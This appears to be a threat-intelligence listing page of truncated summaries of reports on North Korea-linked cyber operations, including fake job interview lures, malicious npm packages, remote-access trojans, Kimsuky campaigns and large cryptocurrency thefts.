387 reports
DPRK-linked Contagious Interview activity is targeting cryptocurrency developers and blockchain companies through fake job interviews, poisoned GitHub repositories, and malicious npm packages. The report describes a multi-stage infection chain that abuses…
Red Asgard identifies OtterCookie as a separate JavaScript and Node.js RAT operating alongside BeaverTail and InvisibleFerret in Lazarus-linked Contagious Interview activity. Unlike BeaverTail’s stored-data theft model, OtterCookie uses Socket.IO over Eng…
Logpresso analyzed four Kimsuky spear-phishing campaigns from early 2026 that used tailored lures against recruiters, business contacts, healthcare and insurance entities, cryptocurrency users and developers, defense-related personnel, and graduate-progra…
The episode examines the operator side of a Lazarus-attributed fake interview credential pipeline. The collection system reportedly captured material from operator workstations as well as targets, exposing social-engineering workflow, persona infrastructu…
Kimsuky has expanded its PebbleDash and AppleSeed-related operations with newly documented tooling, including the Rust-based HelloDoor backdoor, httpMalice, MemLoad/httpTroy, AppleSeed, HappyDoor, VSCode Remote Tunneling, and DWAgent. The campaigns use sp…
Krypt3ia assesses that enterprise AI systems are becoming high-value operational infrastructure because they ingest sensitive data, connect to internal workflows, and increasingly act with delegated authority. The North Korea-focused section argues that D…
CrowdStrike reports that DPRK-nexus actors drove a 51% year-over-year increase in digital asset theft in 2025, stealing a reported $2.02 billion across the financial sector. PRESSURE CHOLLIMA allegedly conducted the largest reported financial theft, takin…
Hybrid Analysis identified a VELVET CHOLLIMA-assessed infostealer operation distributing a signed Windows MSI that masquerades as the Tralert FX cryptocurrency trading application. The installer exposed live credentials and GitLab access tokens, revealing…
OpenSourceMalware shows how malicious packages and repositories abuse legitimate developer automation so payloads can run during `npm install` or when a repository is opened in VS Code. The DPRK-relevant section notes Lazarus-linked Contagious Interview a…
Kimsuky, also tracked as APT-C-55 and BabyShark, is described as an espionage-focused actor that targets government, diplomatic, think tank, media, and academic organizations tied to the Korean Peninsula and other regions. The observed campaign begins wit…
APT45 used AI at scale to recursively analyze CVEs and validate proof-of-concept exploits, showing DPRK-linked interest in AI-augmented vulnerability research and exploit development. GTIG also observed PRC and DPRK-associated clusters using persona-drive…
Arkham describes Lazarus Group as a North Korean state-sponsored hacking unit under the Reconnaissance General Bureau with a long record of major cyber operations, including Operation Troy, Sony Pictures, WannaCry, bank thefts, and cryptocurrency exchange…
A recruiter attributed to North Korea offered $300 per month for a US citizen, or $150 for an EU citizen, to create an Upwork account for his use. The pitch included follow-on compensation of 15% of monthly income after four months, with payment offered i…
An attacker attributed by LayerZero to the DPRK drained about $292 million in rsETH from KelpDAO's LayerZero-powered OFT bridge on April 18, 2026. The excerpt says the attacker compromised Unichain RPC infrastructure used by LayerZero Labs' Gasolina DVN s…
A suspected DPRK IT worker allegedly gained employment at THORSwap and submitted eight pull requests to the official swapkit/SwapKit repository between July and September 2024, with at least three merged. The merged PRs changed wallet integration code for…